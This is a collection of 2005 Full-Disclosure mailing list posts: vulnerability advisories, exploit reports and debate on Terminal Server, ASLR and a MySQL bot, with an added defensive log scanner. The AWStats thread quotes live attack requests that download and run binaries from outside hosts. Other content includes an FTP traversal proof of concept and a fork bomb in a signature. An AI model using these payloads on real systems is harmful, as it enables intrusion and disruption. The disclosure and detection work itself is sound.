Re: [Full-Disclosure] Terminal Server vulnerabilities
Hello,

I agree with everyone that TS is prone to MiTM attacks, since there is no server authentication at all. Have a look at the RDESKTOP sources and you will see a plaintext key exchange at the beginning of the TS session. I suspect this key is related to the L$HYDRAENCKEY_xxx LSA secret. Building a transparent RDP proxy with on-the-fly decryption seems feasible. And don't even think of using the "encryption: low" setting!

But I would point out something much more important: there are many more local exploits than remote (on Windows just like any other OS).

Local exploits: about 1-2 a month
* POSIX - OS/2 subsystem exploitation
* Debugging subsystem exploitation (DebPloit)
* 16-bit subsystem exploitation (NTVDM)
* Shatter Attacks
* Etc.

Remote exploits: about once a year
* RPC/DCOM (blaster)
* LSASS (sasser)

Basically, if you are logged in as an unprivileged user on a Terminal Server, you can easily become SYSTEM. If this Terminal Server is also a Domain Controller, game over.

Regards,
- Nicolas RUFF
---
Security Consultant
EdelWeb (http://www.edelweb.fr/)
Mail: nicolas.ruff (at) edelweb.fr
---

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] /usr/bin/trn local root exploit
I could be wrong, but on my system it's not a suid binary. How's this a local root?
Re: [Full-Disclosure] /usr/bin/trn local root exploit
On Thu, Jan 27, 2005 at 04:54:09AM -0500, ntx0f wrote:
> I could be wrong but on my system it's not a suid binary, how's this a local root?

Maybe, by using some jedi mind tricks? ;)

-- 
* Wojciech Pawlikowski :: ducer at hard-core pl :: NIC-HDL WP5161-RIPE *
* http://ducer.w00nf.org :: http://www.knockdownhc.com :: Born to Hate *
[Full-Disclosure] ITTS ADVISORY 01/05 - Uebimiau <= 2.7.2 Multiple Vulnerabilities
ADVISORY 01 15/01/2005

INTRUDERS TIGER TEAM SECURITY - SECURITY ADVISORY
http://www.intruders.com.br/
http://www.intruders.org.br/

ADVISORY/0105 - UEBIMIAU 2.7.2 MULTIPLE VULNERABILITIES

PRIORITY: HIGH

I - INTRODUCTION:

From http://www.uebimiau.org/

UebiMiau is a simple, yet efficient cross-platform POP3/IMAP mail reader written in PHP. It has many features, such as: Folders, View and Send Attachments, Preferences, Search, Quota Limit, etc. UebiMiau DOES NOT require a database or extra PHP modules (--with-imap).

II - DESCRIPTION:

Intruders Tiger Team Security has identified multiple vulnerabilities in the Uebimiau WebMail Server in its default installation that can be exploited by malicious users to hijack session files and other information on the target system. Intruders Tiger Team Security has discovered that many systems are vulnerable.

III - ANALYSIS

Uebimiau in the default installation creates a temporary folder to store sessions and other files. This folder is defined in inc/config.php as ./database/. If the web administrator doesn't change this folder, an attacker can exploit this using the following request:

http://server-target/database/_sessions/

If the Web server permits directory listing, the attacker can read the session files.

Another problem lies in the way user files are stored. In the default installation the files of the users are stored using the following model:

$temporary_directory/user_domain/

An attacker can access the files of users by requesting:

http://server-target/database/user_domain/

Where user is the target user and domain is the target domain.

Intruders Tiger Team Security has found many servers vulnerable to these attacks.

IV - DETECTION

Intruders Tiger Team Security has confirmed the existence of this vulnerability in Uebimiau version 2.7.2. Other versions are possibly vulnerable too.

V - WORKAROUND

1 STEP - Insert an index.php in each directory of Uebimiau.

2 STEP - Set the variable $temporary_directory to a directory that is not public and has restricted access; set permissions as read-only for the web server user for each file in $temporary_directory.

3 STEP - Set open_basedir in httpd.conf for your clients, following the model below:

<Directory /server-target/public_html>
    php_admin_value open_basedir /server-target/public_html
</Directory>

VI - VENDOR RESPONSE

15/01/2005 - Flaw discovered.
18/01/2005 - Contacted Uebimiau Team.
20/01/2005 - Vendor response.
26/01/2005 - Advisory published.

VII - CREDITS

Glaudson Ocampos (Nash Leon) and Intruders Tiger Team Security discovered this vulnerability.

Thanks to Wendel Guglielmetti Henrique (dum_dum) and Waldemar Nehgme from securityopensource.org.br.

Visit the Intruders Tiger Team Security Web Site for more advisories:
http://www.intruders.com.br/
http://www.intruders.org.br/
[Full-Disclosure] Re: Slackware security updates
On the home page www.slackware.com read the news:

/*
2004-11-27
Pat made a new entry in the ChangeLog giving us all some fresh news about his health conditions. He also stated (Pat's gpg signed message) that the security packages (patches) from the GUS-BR group (GUS GPG KEY) are trusted.

EDITED on 2004-12-07
A mirror of the GUS-BR tree can be found on osuosl (ftp and http).
*/

There have been no official patches on the website since November 2004; you should manually update your system... Or trust someone else's packages... Or track slackware-current...

Matteo Giannone
RE: [lists] [Full-Disclosure] Terminal Server vulnerabilities
> Of course, one of the very first things you should do on a Windows box is rename the administrator account, so this kind of blind brute-forcing is not possible.

There are ways to find out the usernames that are admin: they begin with 500_ (do a Google search if you want). Any script kiddy worth his salt will tell u this... So this one is off, because renaming the admin account will only be security thru obscurity, which is not good for the internet...
Re: [Full-Disclosure] Terminal Server vulnerabilities
On Thu, 27 Jan 2005 09:00:39 +0100, Nicolas RUFF (lists) said:

> But I would point out something much more important: there are many more local exploits than remote (on Windows just like any other OS).
>
> Local exploits: about 1-2 a month
> * POSIX - OS/2 subsystem exploitation
> * Debugging subsystem exploitation (DebPloit)
> * 16-bit subsystem exploitation (NTVDM)
> * Shatter Attacks
> * Etc.
>
> Remote exploits: about once a year
> * RPC/DCOM (blaster)
> * LSASS (sasser)
>
> Basically, if you are logged in as an unprivileged user on a Terminal Server, you can easily become SYSTEM. If this Terminal Server is also a Domain Controller, game over.

You forgot one important factor - the use of IE and Outlook for the fast direct-to-customer delivery of local exploits. Which *also* results in a Game Over.
RE: [Full-Disclosure] Slackware Security updates
I've seen linux distributions sometimes posting their security updates here on full-disclosure. Guys, I always wanted to bring this up: why do we have to send the updates to this list? Why not make another list just for this, or anyone who wants the security alerts could get them directly from the original source. Maybe this might save a lot of bandwidth.

-aditya
Re: [lists] [Full-Disclosure] Terminal Server vulnerabilities
> There are ways to find out the usernames that are admin they begin with 500_ ( do a Google search if you want ) Any script kiddy worth his salt will tell u this... So this one is off because renaming admin account will only be security thru obscurity which is not good for the internet...

It's also only possible when you've got NetBIOS/CIFS open to the Internet, which is something even worse on the Internet. Even though the SID/RID of the administrator can be determined remotely under these conditions, I'd still recommend the renaming of the account as a standard hardening procedure.

And fwiw, the fact that a security safeguard can be overcome is not a reason to completely disregard it. With this argumentation, you could sell your firewalls.

Cheers,
j.
[Full-Disclosure] Terminal services-additional help
In addition, you can install cygwin (www.cygwin.com) with openssh and tunnel terminal services through openssh (very simple to do with putty). And then use your router or firewall to block port 3389.

-Eddie B.

> On Tue, 25 Jan 2005 14:38:30 -0600, Curt Purdy (purdy at tecman.com) wrote:
>> The problem with terminal server is not any vulnerabilities that can be exploited, but the fact that administrator can be bruteforced (6 attempts followed by reconnect) and that it is screaming its existence on port 3889. If you use it, definitely change the port in the registry.
>
> You can use the local security policy to prevent administrators from logging in via terminal services and then enable "run as" for administrative tasks... which should be done anyway. Changing the port number is another good step though.
>
> --
> Jonathan
Re: [Full-Disclosure] Slackware Security updates
Maybe you should contact the Slackware maintainer(s) regarding this. FD has no control over slackware or any other distributions.

[]s

On Wed, Jan 26, 2005 at 02:57:00PM -0200, Carlos de Oliveira wrote:
> Hi there!
> I've seen linux distributions sometimes posting their security updates here on full-disclosure. I have used slackware linux for some time, but I never gave importance to slackware updates, and I want to know why there are no slackware update announcements here? Maybe slackware is so powerful that it doesn't need patches? ehheehh
> Or, where can I get the slack patches?
> Once again sorry for my poor English, I am training.

-- 
Rodrigo Barbosa [EMAIL PROTECTED]
"Quid quid Latine dictum sit, altum viditur"
"Be excellent to each other ..." - Bill & Ted (Wyld Stallyns)
[Full-Disclosure] Re: [ GLSA 200501-36 ] AWStats: Remote code execution
* [EMAIL PROTECTED] (Delian Krustev) [Thu 27 Jan 2005, 01:44 CET]:
> There's an exploit in the wild. Here's what it does:
>
> 200.96.166.252 - - [26/Jan/2005:06:32:00 +] "GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/cgi;ls%20-la%20cgi;chmod%20777%20cgi;./cgi;%00 HTTP/1.1" 200 538 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
> 200.96.166.252 - - [26/Jan/2005:06:34:30 +] "GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/dc;chmod%20777%20dc;./dc%20cyber.yar.ru%208080;%00 HTTP/1.1" 200 554 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

It's been out there for a while already:

208.53.170.6 - - [29/Dec/2004:12:20:43 +0100] "GET /cgi-bin/awstats.pl?year=2003&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Ajrown.com/ssh.a;perl%20ssh.a;wget%20jrown.com/buy/bot.txt;perl%20bot.txt;rm%20-rf%20ssh.*;rm%20-rf%20bot*%3B%%0A20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%0A%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5%0AD%29.%2527 HTTP/1.1" 200 47768 "-" "LWP::Simple/5.800"

Those files don't exist there anymore.

-- 
Niels.
-- 
(please reply to niels=bugtraq@ instead of niels-bugtraq@ - except for the gazillion autoresponders of course)
[Full-Disclosure] Remotely exploitable file traversal vulnerability in SnugServer 3.0.0.40 FTP Service
See Security, Research and Development
www.see-security.com
--

[-] Product Information

SnugServer - All your Software Servers in 1 Application. Upload and download files to/from the Internet. Unique firewall file system where your FTP files can be stored in a data file to prevent internal network hacker attacks.

Product Homepage: http://www.snugserver.com/

[-] Vulnerability Description

A file traversal vulnerability has been discovered in the SnugServer 3.0.0.40 FTP Service, which allows access to the server filesystem outside of ftproot.

[-] PoC

[EMAIL PROTECTED]:/# ftp 192.168.1.154
Connected to 192.168.1.154.
220- Welcome FTP User. SnugServer is ready.
Name (192.168.1.154:root): [EMAIL PROTECTED]
331 Password required for [EMAIL PROTECTED]
Password:
230 See FTP Server
Remote system type is You.
ftp> ls
200 PORT Command Successful.
150 Opening ASCII mode data connection for directory listing.
drw-rw-rw- 1 owner group 0 Jan 21 03:51 ..
drw-rw-rw- 1 owner group 0 Jan 21 02:08 dir
226 Transfer Complete.
ftp> cd ...
200 PORT Command Successful.
ftp> ls
200 PORT Command Successful.
150 Opening ASCII mode data connection for directory listing.
drw-rw-rw- 1 owner group       0 Jan 21 03:51 ..
drw-rw-rw- 1 owner group       0 Jan 21 03:51 Cert
drw-rw-rw- 1 owner group       0 Jan 21 03:51 Logs
drw-rw-rw- 1 owner group       0 Jan 21 03:51 Requests
drw-rw-rw- 1 owner group       0 Jan 21 03:51 Scripts
drw-rw-rw- 1 owner group       0 Jan 21 03:51 Errors
drw-rw-rw- 1 owner group       0 Jan 21 03:51 Queue
drw-rw-rw- 1 owner group       0 Jan 21 03:51 www
drw-rw-rw- 1 owner group       0 Jan 21 03:51 Infected
drw-rw-rw- 1 owner group       0 Jan 21 03:51 Temp
drw-rw-rw- 1 owner group       0 Jan 21 03:51 Filtered
drw-rw-rw- 1 owner group       0 Jan 21 03:51 BaseData
-rw-rw-rw- 1 owner group 8421376 Jan 21 03:52 SNUG.FDB
drw-rw-rw- 1 owner group       0 Jan 21 03:51 ftp
-rw-rw-rw- 1 owner group 1861120 Jan 21 03:52 Snug.gbk
-rw-rw-rw- 1 owner group      32 Jan 21 03:52 yarrow.rnd
226 Transfer Complete.
ftp>

[-] Patch

The vendor has been notified, and an update is available at:
http://www.snugserver.com/download.php

[-] Credits

This vulnerability was discovered by muts
[Full-Disclosure] Advances in Security in the Linux Kernel and RedHat idiocy
Just wanted to point out to you guys the INCREDIBLE advances in Linux security underway on LKML from security expert Arjan van de Ven:

http://lkml.org/lkml/2005/1/27/62

On the subject of his i386-only mmap randomization patch:

> The randomisation range is 1 megabyte (this is bigger than the stack randomisation since the stack randomisation only needs 16 bytes alignment while the mmap needs page alignment, a 64kb range would not have given enough entropy to be effective)

If we do a little math..

1048576 / 4096 = 256
65536 / 16 = 4096

256 different locations for the mmap base, 4096 different locations for the stack (and apparently argv/envp pages get no randomization).

Anyone with half a brain would see this is a joke, but not security expert Arjan van de Ven:

http://lkml.org/lkml/2005/1/27/56

> full randomisation makes it not possible to use absolute addresses in the exploit.

I guess anyone who thinks that taking a hardcoded exploit and running it 256 times would always result in a successful exploit is stupid.

In true non-hackery fashion, it has a sysctl entry that will disable randomization entirely if for instance a single developer on the system needs to debug a single application:

http://lkml.org/lkml/2005/1/27/57

But then someone complained that it should be more fine-grained, so now if PT_GNU_STACK is disabled on the app, randomization will be turned off as well. I guess that's RedHat's definition of it.

And remember kids, if you're owning Fedora or RHEL, you can bypass all this randomization (the junk in Exec-shield isn't any better) for suid apps by abusing a vuln in RedHat's glibc that leaks randomization info by using LD_DEBUG=files or LD_DEBUG=all or LD_TRACE_PRELINKING. BTW, this remains unfixed since *AUGUST* of last year. Bugzilla reports were filed, even an LWN article was posted about the problem:

http://lwn.net/Articles/99137/

3 months later, on December 7th, Jakub committed a fix to glibc that I guess he never tested. The only change made was to add LD_DEBUG to unsecvars.h. If he had bothered to listen to other people, or looked at the fixes from other distros, he would have seen his fix wasn't enough. Yet now he's rejecting any bug reports on the subject, claiming he has fixed the problem:

https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=146207

Yet I've just verified from two separate users of Fedora Core 3 that the problem is indeed *NOT* fixed, verifying my analysis of elf/rtld.c that it was not fixed.

Tilting the scale of security hype back to reality,
-Brad
[Full-Disclosure] Security Contact in Vonage
Hi,

I am looking for a security contact in Vonage (www.vonage.com). I have tried more than once to call their number, and have stopped waiting after 15 minutes of being put on hold.

-- 
Noam Rathaus
CTO
Beyond Security Ltd.
http://www.beyondsecurity.com
http://www.securiteam.com
[Full-Disclosure] NSFOCUS SA2005-01 : Buffer Overflow in WinAMP in_cdda.dll CDA Device Name
NSFOCUS Security Advisory (SA2005-01)

Topic: Buffer Overflow in WinAMP in_cdda.dll CDA Device Name

Release Date: 2005-01-27

CVE CAN ID: CAN-2004-1150

http://www.nsfocus.com/english/homepage/research/0501.htm

Affected systems & software
===========================

Nullsoft WinAMP 5.0
Nullsoft WinAMP 5.01
Nullsoft WinAMP 5.02
Nullsoft WinAMP 5.03
Nullsoft WinAMP 5.04
Nullsoft WinAMP 5.05
Nullsoft WinAMP 5.06
Nullsoft WinAMP 5.07
Nullsoft WinAMP 5.08

Unaffected systems & software
=============================

Nullsoft WinAMP 2.X
Nullsoft WinAMP 5.08c

Summary
=======

WinAMP is a popular media player that supports various media and playlist formats, including playlists in m3u or pls format. NSFocus Security Team has found a buffer overflow vulnerability in the plug-in by which WinAMP plays CDs. An attacker can construct a malicious playlist file that is embedded in an HTML page. If a user is persuaded to click it, then the attacker can gain complete control over the user's system.

Description
===========

WinAMP implements various functionalities through different plug-ins that are stored in the plugins sub-directory of the WinAMP installation directory. For example, in_mp3.dll is used to play MP3 files and in_cdda.dll is used to play CDs. The in_cdda.dll of WinAMP supports play path requests in the following formats:

1. Driver\PathName\[FileName].cda
2. linein://
3. cda://
4. cda://Driver
5. cda://Driver,TrackNumber

Brett Moore of Security-Assessment.com discovered a stack overflow when in_cdda.dll handles the first path. WinAMP released version 5.07 to fix that vulnerability. Actually, in_cdda.dll will still cause an overflow when handling the 4th and 5th paths above. A stack overflow will be triggered only by adding an over-long device name or sound track number behind cda://.

Any method that can pass a play path to WinAMP can be used to trigger this vulnerability, for example the command line. One possible remote attack vector is to construct a playlist file in m3u or pls format with an over-long path and embed it in HTML. Once a user visits such a malicious page, it will execute the code of the attacker's choice.

Workaround
==========

NSFOCUS suggests removing in_cdda.dll from the Plugins directory of WinAMP.

Vendor Status
=============

2004.11.24 Informed the vendor [EMAIL PROTECTED], no response
2004.12.06 Tests proved winamp 5.07 is affected, informed the vendor again
2004.12.07 The vendor confirmed the vulnerability
2004.12.25 Tests proved winamp 5.08 is affected, informed the vendor
2005.01.10 The vendor released winamp 5.08c to fix the vulnerability

The vendor has released winamp 5.08c to fix this vulnerability. The latest version is available at http://www.winamp.com/player/

Additional Information
======================

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2004-1150 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. Candidates may change significantly before they become official CVE entries.

Acknowledgment
==============

Yu Yang of NSFOCUS Security Team found the vulnerability.

DISCLAIMS
=========

THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESSED OR IMPLIED, EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENT SHALL NSFOCUS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PROVIDED THAT THE ADVISORY IS NOT MODIFIED IN ANY WAY.

Copyright 1999-2005 NSFOCUS. All Rights Reserved. Terms of use.

NSFOCUS Security Team [EMAIL PROTECTED]
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)

PGP Key: http://www.nsfocus.com/homepage/research/pgpkey.asc
Key fingerprint = F8F2 F5D1 EF74 E08C 02FE 1B90 D7BF 7877 C6A6 F6DA
Re: [Full-Disclosure] spoolcll.exe - new worm being distributed via mysql vulnerability?
Check out today's diary at SANS.
http://isc.sans.org/

On Thu, 27 Jan 2005 00:18:21 -0500, Mike Bailey [EMAIL PROTECTED] wrote:
> Aloha,
>
> Earlier tonight, I was sitting here at home doing some normal browsing, and work, and my firewall alerted me that a program called spoolcll.exe was attempting to open up a port which I cannot remember now. I tried killing it, but it just came back, over and over again, each time spawning itself on a new port. Registry says the worm created a service called evmon; it cannot be paused or stopped, but it can be disabled. The only information about this worm on google is a discussion at the following url:
>
> http://forums.whirlpool.net.au/forum-replies.cfm?t=291921&p=1
>
> They are beginning to determine that it is being distributed via a hole in mysql. Do any of you know anything about this?
>
> Thanks in advance.
>
> --
> Love,
> Mike Bailey
Re: [Full-Disclosure] MDKSA-2005:020 - Updated kdegraphics packages fix buffer overflow vulnerability
On Jan 25, 2005, at 22:57, Rembrandt wrote:

> On Tue, 25 Jan 2005 21:51:01 -0700
> Mandrake Linux Security Team [EMAIL PROTECTED] wrote:
>
> Dear Mandrake Linux Security Team,
>
> Why can't you spam another mailinglist? Or create your own for your PATCHES? It gets on my nerves to get more than one mail from you a month. How do you provide something? Code? Proof-of-concept exploits? You just write "We fixed...". Or in other words, "Hey guys, there's something wrong with a package related to our OS." If MS would send a mail to this mailinglist for every patch they wrote, the list-owner would kick out MS for that. I don't know why it should be different for you or any other OS.

Hmmm... like many other vendors, we "spam" a number of mailing lists (FD, bugtraq (when they feel like putting new messages through), and our own security-announce list). Do you rant at Gentoo, Debian, Ubuntu... (the list goes on) as well?

Anyways, you seem to be a moderately intelligent person, so why don't you set up a filter in sylpheed to send all mail from [EMAIL PROTECTED] to /dev/null? Should be pretty straightforward. That way you don't have to get "nerved" and the people who do appreciate the advisories can continue to receive them.

If the list owners asked us to stop, we would respectfully do it. But, since you're asking, I think I'll just leave it up to you to figure out how to filter mail (it's a fairly amazing concept once you get it figured out).

-- 
lynx -source http://linsec.ca/vdanen.asc | gpg --import
{FEE30AD4 : 7F6C A60C 06C2 4811 FA1C A2BC 2EBC 5E32 FEE3 0AD4}
[Full-Disclosure] Possible new MYSql Worm
Dear List,

Watch out for Spoolcll.exe or connects to Port 3306.

http://forums.whirlpool.net.au/forum-replies.cfm?t=291921&p=1
http://isc.sans.org/index.php

-- 
Thierry Zoller
http://www.sniff-em.com/secureit.shtml
Re: [Full-Disclosure] Advances in Security in the Linux Kernel and RedHat idiocy
On Thu, Jan 27, 2005 at 11:10:43AM -0500, Brad Spengler wrote:
> Just wanted to point out to you guys the INCREDIBLE advances in Linux security underway on LKML from security expert Arjan van de Ven:
>
> http://lkml.org/lkml/2005/1/27/62
>
> On the subject of his i386-only mmap randomization patch:
>
>> The randomisation range is 1 megabyte (this is bigger than the stack randomisation since the stack randomisation only needs 16 bytes alignment while the mmap needs page alignment, a 64kb range would not have given enough entropy to be effective)
>
> If we do a little math..
>
> 1048576 / 4096 = 256
> 65536 / 16 = 4096
>
> 256 different locations for the mmap base, 4096 different locations for the stack (and apparently argv/envp pages get no randomization)
>
> Anyone with half a brain would see this is a joke, but not security expert Arjan van de Ven:

I think the joke is on you in this case. There is a large patch series of which you judge the first steps only. Those steps introduce the infrastructure and concepts into the kernel, and later patches will tweak the exact numbers to values with more entropy. ONCE THE EXISTING INFRASTRUCTURE IS ACCEPTED AND DEBUGGED. Maybe you don't understand that; I assume a lot of the other readers of this list do. You don't plop a huge patch into the linux kernel in one chunk. You do it in nice small, incremental and debuggable steps.
Re: [Full-Disclosure] spoolcll.exe - new worm being distributed viamysql vulnerability?
Definitely confusing, but I believe it stems from a weak root passwd. The bot first has to authenticate to mysql as the 'root' user. Then it seems to launch the exploit allowing it access to create the dynamic libraries containing User Defined Functions.

On Thu, 27 Jan 2005 11:47:57 -0600, Dolan, Patrick [EMAIL PROTECTED] wrote:
> From the article text:
>
> "The bot uses the MySQL UDF Dynamic Library Exploit. In order to launch the exploit, the bot first has to authenticate to mysql as 'root' user. A long list of passwords is included with the bot, and the bot will brute force the password."
>
> Looks like this is small part exploit, and large part bad root password selection. Though I'm not even sure about the exploit part, because the text later says:
>
> "This bot does not use any vulnerability in mysql. The fundamental weakness it uses is a week[sic] 'root' account."
>
> Patrick Dolan
> Information Security Analyst
>
> -----Original Message-----
> From: Jeremy Davis [mailto:[EMAIL PROTECTED]
> Sent: Thursday, January 27, 2005 11:23 AM
> To: Mike Bailey
> Cc: full-disclosure@lists.netsys.com
> Subject: Re: [Full-Disclosure] spoolcll.exe - new worm being distributed viamysql vulnerability?
>
> Check out today's diary at SANS.
> http://isc.sans.org/
>
> On Thu, 27 Jan 2005 00:18:21 -0500, Mike Bailey [EMAIL PROTECTED] wrote:
>> Aloha,
>>
>> Earlier tonight, I was sitting here at home doing some normal browsing, and work, and my firewall alerted me that a program called spoolcll.exe was attempting to open up a port which I cannot remember now. I tried killing it, but it just came back, over and over again, each time spawning itself on a new port. Registry says the worm created a service called evmon; it cannot be paused or stopped, but it can be disabled. The only information about this worm on google is a discussion at the following url:
>>
>> http://forums.whirlpool.net.au/forum-replies.cfm?t=291921&p=1
>>
>> They are beginning to determine that it is being distributed via a hole in mysql. Do any of you know anything about this?
>>
>> Thanks in advance.
>>
>> --
>> Love,
>> Mike Bailey
Re: [Full-Disclosure] spoolcll.exe - new worm being distributed via mysql vulnerability?
> my firewall alerted me that a program called spoolcll.exe
> the worm created a service called evmon
> The only information about this worm on google is a discussion at the following url:
> http://forums.whirlpool.net.au/forum-replies.cfm?t=291921&p=1
> they are beginning to determine that it is being distributed via a hole in mysql.

There is a slashdot.org article & comments. It looks like it exploits a few sysadmin brain vulnerabilities: weak password, bad practice. I guess the mysql vulnerability is required for copying & executing the bot.

http://it.slashdot.org/it/05/01/27/1546222.shtml?tid=220&tid=172&tid=95

*Don't keep the port open!* by [EMAIL PROTECTED]

99.99% of people who run MySQL run it on the same machine as their webserver that queries it. Most people don't actually do queries /across the network/ to the database server. Just run MySQL with --skip-networking at startup (skip-networking in my.cnf), to disable MySQL from listening on port 3306.
RE: [Full-Disclosure] spoolcll.exe - new worm being distributed viamysql vulnerability?
From the article text: The bot uses the MySQL UDF Dynamic Library Exploit. In order to launch the exploit, the bot first has to authenticate to mysql as 'root' user. A long list of passwords is included with the bot, and the bot will brute force the password. Looks like this is small part exploit, and large part bad root password selection. Though I'm not even sure about the exploit part because the text later says: This bot does not use any vulnerability in mysql. The fundamental weakness it uses is a week[sic] 'root' account. Patrick Dolan Information Security Analyst -Original Message- From: Jeremy Davis [mailto:[EMAIL PROTECTED] Sent: Thursday, January 27, 2005 11:23 AM To: Mike Bailey Cc: full-disclosure@lists.netsys.com Subject: Re: [Full-Disclosure] spoolcll.exe - new worm being distributed viamysql vulnerability? Check out todays diary at SANS. http://isc.sans.org/ On Thu, 27 Jan 2005 00:18:21 -0500, Mike Bailey [EMAIL PROTECTED] wrote: Aloha, Earlier tonight, i was sitting here at home doing some normal browsing, and work and my firewall alerted me that a program called spoolcll.exe was attempting to open up a port which i cannot remember now. i tried killing it, but it just came back, over and over again each time spawning itselfs on a new port. Registry says the worm created a service called evmon, it cannot be paused or stopped, but it can be disabled. The only information about this worm on google is a discussion at the following url: http://forums.whirlpool.net.au/forum-replies.cfm?t=291921p=1 they are beginning to determinthat it is being distributed via a hole in mysql. Do any of you know anything about this? Thanks in advance. -- Love, Mike Bailey ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. 
[Full-Disclosure] Re: [ GLSA 200501-36 ] AWStats: Remote code execution
Delian Krustev wrote:

> There's an exploit in the wild. Here's what it does:
>
> 200.96.166.252 - - [26/Jan/2005:06:32:00 +] GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/cgi;ls%20-la%20cgi;chmod%20777%20cgi;./cgi;%00 HTTP/1.1 200 538 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
>
> 200.96.166.252 - - [26/Jan/2005:06:34:30 +] GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/dc;chmod%20777%20dc;./dc%20cyber.yar.ru%208080;%00 HTTP/1.1 200 554 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
>
> I don't have the time to investigate the cgi and dc binaries. The cgi at least tries to daemonize and opens a TCP listening socket. They also try to replace the index page on the vulnerable site.

In the same site you can download:

wget http://www.nokiacentrum.cz/dcha0s/dc.c
wget http://www.nokiacentrum.cz/dcha0s/cgi.c
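An added example, not part of the post above or of AWStats, showing how a defender can sweep existing web server access logs for the configdir pipe-injection pattern quoted in the log lines. The log lines below are constructed in combined log format with the attacker's host and download URL replaced by placeholders; the hosts, paths and `SHELL_META` list are assumptions.

```python
import re
from urllib.parse import unquote

# Combined/common log format prefix: client, identd, user, [timestamp], "METHOD target HTTP/x", status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')

# Shell metacharacters that have no business in an AWStats configdir value (assumed list).
SHELL_META = ('|', ';', '`', '$(', '\x00', '\n')

# Constructed sample lines modelled on the ones quoted in the post; attacker host/URL replaced.
SAMPLE_LOG = """\
192.0.2.10 - - [26/Jan/2005:06:32:00 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://example.invalid/x;chmod%20777%20x;./x;%00 HTTP/1.1" 200 538 "-" "Mozilla/4.0"
192.0.2.11 - - [26/Jan/2005:07:00:00 +0000] "GET /cgi-bin/awstats/awstats.pl?config=www.example.com&output=main HTTP/1.1" 200 9812 "-" "Mozilla/5.0"
192.0.2.12 - - [26/Jan/2005:07:01:00 +0000] "GET /index.html HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

def split_query(query):
    """Split a raw query string into percent-decoded (key, value) pairs on '&' only,
    so the ';' inside an injected value is kept as part of that value."""
    pairs = []
    for part in query.split('&'):
        if part:
            key, _, value = part.partition('=')
            pairs.append((unquote(key), unquote(value)))
    return pairs

def inspect_request(target):
    """Return the decoded configdir value if it carries shell metacharacters, else None."""
    path, _, query = target.partition('?')
    if not path.endswith('/awstats.pl'):
        return None
    for key, value in split_query(query):
        if key == 'configdir' and any(m in value for m in SHELL_META):
            return value
    return None

def scan_log(text):
    """Return one finding per suspicious awstats.pl request; a 200 status on such a
    request means the server answered normally, i.e. the injected command likely ran."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and (hit := inspect_request(m.group('target'))) is not None:
            findings.append({'client': m.group('client'), 'time': m.group('ts'),
                             'status': m.group('status'), 'decoded': hit})
    return findings

if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} status={f['status']} configdir={f['decoded']!r}")
```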
Re: [Full-Disclosure] Advances in Security in the Linux Kernel and RedHat idiocy
On Thu, 27 Jan 2005, Brad Spengler wrote:

> I guess anyone who thinks that taking a hardcoded exploit and running it 256 times would always result in a successful exploit is stupid.

It would not always result in a successful exploitation; just as flipping the coin twice is not a guarantee of getting tails once.

Other than that, the amount of randomization is indeed puny; but then, even 32-bit randomization is a good defense only in certain situations, and often, can be defeated with some time, aided by luck or a decent NOP-equivalent sled.

--
------------------------- bash$ :(){ :|:};: ------------------------
Michal Zalewski * [http://lcamtuf.coredump.cx]
Did you know that clones never use mirrors?
--------------------------- 2005-01-27 20:31 --
http://lcamtuf.coredump.cx/photo/current/
RE: [lists] [Full-Disclosure] Terminal Server vulnerabilities
> It's also only possible when you've got NetBIOS/CIFS open to the Internet,

Yes I know... That is why I said security thru obscurity

> With this argumentation, you could sell your firewalls.

No I would not. I would use an ids with properly tuned sigs for the terminal server and then connect the terminal server via a proxy like vnc running something over freebsd or linux. I would never allow a windows terminal server to be directly connected to the net...

-aditya
Re: [lists] [Full-Disclosure] Terminal Server vulnerabilities
> No I would not. I would use an ids with properly tuned sigs for the terminal server and then connect the terminal server via a proxy like vnc running something over freebsd or linux. I would never allow a windows terminal server to be directly connected to the net...

Spot the two obvious mistakes in this reply.

I retreat from the discussion, should've held back my first comment.

j.
RE: [Full-Disclosure] Terminal Server vulnerabilities
